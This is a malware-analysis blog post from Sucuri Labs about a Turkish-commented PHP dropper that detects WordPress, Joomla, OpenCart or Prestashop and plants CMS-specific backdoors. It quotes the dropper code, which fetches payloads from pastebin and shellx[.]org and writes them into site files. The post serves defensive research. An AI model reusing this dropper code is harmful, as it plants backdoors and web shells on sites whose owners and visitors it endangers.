• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Backdoor Shell Dropper Deploys CMS-Specific Malware

October 6, 2020Krasimir Konov

FacebookTwitterSubscribe

A large majority of the malware we find on compromised websites are backdoors that allow an attacker to maintain unauthorized access to the site and execute whatever commands they want.

Another common scenario includes malware which is directly injected into a website’s files and used to redirect traffic, steal credit cards and other sensitive information, hijack resources to mine for cryptocurrencies, or even serve unwanted ads.

In this case, the attacker uploaded what we suspect to be a malicious Turkish dropper — the code comments include the Turkish language which, when translated, indicates intent to inject additional pieces of malware on the site.

One interesting aspect of this sample is that the code checks for different CMS versions (WordPress, Joomla, Opencart, Prestashop) and deploys the malware based on the current environment.

@chmod($_SERVER['DOCUMENT_ROOT'] . "/wp-load.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/index.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/index.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/.htaccess", 0644);
function http_get($url){
        $im = curl_init($url);
        curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($im, CURLOPT_HEADER, 0);
        return curl_exec($im);
        curl_close($im);
}
$hector77734 = $_SERVER['DOCUMENT_ROOT'] . "/indeeex.php" ; /**/
$hectortxt77734 = http_get('https://pastebin[.]com/raw/t4PchdWx');
@$open77734 = fopen($hector77734, 'w');
@fwrite($open77734, $hectortxt77734);
@fclose($open77734);

By default, the code attempts to change the permissions for a few files before using the cURL request through http_get() to obtain additional content from pre-defined pastebin links. The malware then writes it into indeeex.php using fwrite().

Next, the dropper targets different CMS’s — starting with Joomla specifically — by using the function file_exists() to confirm if the core file “/includes/defines.php” exists.

Attackers then download additional files (joomlahide.zip and joomla.zip) from shellx[.]org:

$jooomla = $_SERVER['DOCUMENT_ROOT'] . "/includes/defines.php";
if (file_exists($jooomla)) {
$hector5 = $_SERVER['DOCUMENT_ROOT'] . "/administrator/systeam.php";
$hectortxt5 = http_get('https://pastebin[.]com/raw/sv5Bf4gv');
@$open5 = fopen($hector5, 'w');
@fwrite($open5, $hectortxt5);
@fclose($open5);

@copy('hxxp://shellx[.]org',$_SERVER['DOCUMENT_ROOT']."/administrator/help/joomlahide.zip");
@copy('hxxp://shellx[.]org/',$_SERVER['DOCUMENT_ROOT']."/administrator/help/joomla.zip");


These zips contain two other files: a file uploader backdoor and the An0n_3xPloiTeR shell.

For the other CMS’s, they used the same method of checking if specific core files exist and downloading additional content from shellx[.]org

OpenCart

/*BURDAN Aşşağı OPENCART*/
$oopencart = $_SERVER['DOCUMENT_ROOT'] . "/system/config/";
if (file_exists($oopencart)) {

$hector44441 = $_SERVER['DOCUMENT_ROOT'] . "/catalog/view/heck.php" ;
$hectortxt44441 = http_get('https://pastebin[.]com/raw/sv5Bf4gv');
@$open44441 = fopen($hector44441, 'w');
@fwrite($open44441, $hectortxt44441);
@fclose($open44441);

Prestashop

/*BURDAN aşşağı petrashop*/
$pretashop = $_SERVER['DOCUMENT_ROOT'] . "/config/smarty.config.inc.php";
if(file_exists($pretashop)){
mkdir($_SERVER['DOCUMENT_ROOT'] . "/modules/petra/");
$hector4 = $_SERVER['DOCUMENT_ROOT'] . "/modules/petra/image.php" ;
$hectortxt4 = http_get('https://pastebin[.]com/raw/9jDX17nP');
$open4 = fopen($hector4, 'w');
fwrite($open4, $hectortxt4);
fclose($open4);

These types of malicious droppers are often hard to detect because their goal is not to directly execute a backdoor, remote shell, or file upload. Instead, they act as a bridge between the attacker and the other malicious resources they want to inject on the website.

One of the best ways to mitigate risk and identify malicious behavior is to use  a file integrity monitoring system to detect and alert for content tampering.

FacebookTwitterSubscribe

Categories: Drupal Security, Joomla Security, Magento Security, Sucuri Labs, Website Malware Infections, Website Security, WordPress SecurityTags: Black Hat Tactics, Conditional Malware, Hacked Websites, Website Backdoor

About Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.